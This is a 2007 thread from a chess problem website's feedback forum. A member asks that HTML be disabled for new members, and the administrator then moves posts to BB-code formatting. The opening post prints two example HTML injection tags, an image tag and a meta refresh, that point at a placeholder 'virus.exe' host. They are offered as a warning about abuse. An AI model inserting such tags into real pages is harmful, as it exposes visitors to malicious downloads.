Website founded by Milan Velimirović in 2006
23:07 UTC
| |
MatPlus.Net Forum Feedback by Members Disable HTML by default for new members |
|
|
|
You can only view this page!
| | (1) Posted by Sarah Hornecker [Wednesday, Apr 4, 2007 10:23] | Disable HTML by default for new members As we all know, HTML is "powerful" to speak this way but also can easily be abused. There are several easy tags that could potentially harm. I'll show two potential dangers below.
Note, I make the tags here with lt and gt commands so they can't create harmful code. If you simply copy-paste it, however, it can be harmful (not with these parameters but it could at least make this thread unusable by redirecting to non-existant files) so don't copy-paste this code or it will become valid HTML.
<img src="http://domain.tld/virus.exe" width="1" height="1"> (this may be fixed by now but also may be not fixed. It's the way several people place cookie-like images on PCs by loading them into the cache and referring to it. By setting a non-image the set file is executed upon loading a page)
or simply
<meta http-equiv="Refresh" content="1; URL=http://domain.tld/virus.exe"> (since this IS a valid HTML command it will ever be harmful. It's used for redirection purposes. By setting the number after "content" to 0, this would be done instantly.)
So people could abuse this. Worse: Bots can abuse this. They can register (they're intelligent enough today to pass registrations with e-mail activation and even image codes) and use this code to make one download viruses etc.
So I think, HTML should be generally turned off for new users and given after approval of the person.
What do you think, and especially MV? | | (2) Posted by Administrator [Wednesday, Apr 4, 2007 12:07] | You have right, Siegfried. The possibility of inserting HTML tags is not safe and it was supposed to be replaced by a new set of text formattiing tags as soon as possible. However, there have always been many more "urgent" things to do, so after now already six months (how the time flies!) the plan have not been realized yet, moreover, it have almost been forgotten. Thank you for a reminding message Siegfried, this will be the first thing to be fixed. It may take some time, but the first action, disabling the HTML formatting for ALL posts, have been taken immediately.
A side effect is that old messages containing a genuine HTML tags will not be displayed as expected by authors. Not many of them, luckilly! | | (3) Posted by Mihail Croitor [Wednesday, Apr 4, 2007 12:19] | I can see, that we can use BB-codes for decorating our messages. And, I think, the most of users don't know BB-codes.
May be, will be usefull a help about BB-codes and (or) quick-insert BB-code panel?
best wishes,
Mihail | | (4) Posted by Administrator [Wednesday, Apr 4, 2007 12:33] |
QUOTE Mihail: I can see, that we can use BB-codes for decorating our messages
The truth is that something has been done in implementing the usual BB formatting, but the job have not been finished yet and therefore nothing has been made publicly known so far.
QUOTE Administrator: ... old messages containing a genuine HTML tags will not be displayed as expected...
Not any more, old messages are now marked safe and will be displayed as intended. | | (5) Posted by Harry Fougiaxis [Tuesday, May 1, 2007 00:02] | Is there any progress on this, Milan? I tried to use bold and italics in a post today and it still doesn't work... | | (6) Posted by Administrator [Tuesday, May 1, 2007 04:01] | At the moment, except old diagram drawing, piece drawing and table formatting commands, you can use following tags to decorate your posts:
[q] ... [/q] to surround quoted text
[b] ... [/b] to surround bold face
[i] ... [/i] to surround italic face
[n] for soft line break
[ul] ... [/ul] for unordered lists
[ol] ... [/ol] for ordered lists
[li] ... [/li] for list items
Tags are enclosed with angle brackets and must be in lowercase characters.
A new feature is URLs to links conversion which is applied to:
- all fully qualified url names starting with protocol prefix ("http://", "https://", "ftp://", etc.);
- partial URLs starting with "www." in which case a http prefix is assumed.
All links will be opened in new window.
These features have not been tested thoroughly and because of that not documented so far - but you asked for it :) -, so please use them with extreme caution!
| | (7) Posted by Hauke Reddmann [Wednesday, May 2, 2007 10:45] |
QUOTE
QUOTE TEST
Just testing what happens with nested quotes.
BTW, it would be fine if one had, instead of just a "Reply" button,
two: one for "Reply" and one for "Quote" (the latter putting the
quoted post automatically in quote tags; trimming it is the
obligation of the quoter!)
Also the quotes could be marked with "QUOTE $USER $POSTNR" -
be sure I warn you beforehand when this board starts turning into
some Matplus-chan :-)
Hauke | | No more posts |
MatPlus.Net Forum Feedback by Members Disable HTML by default for new members |
|
|
|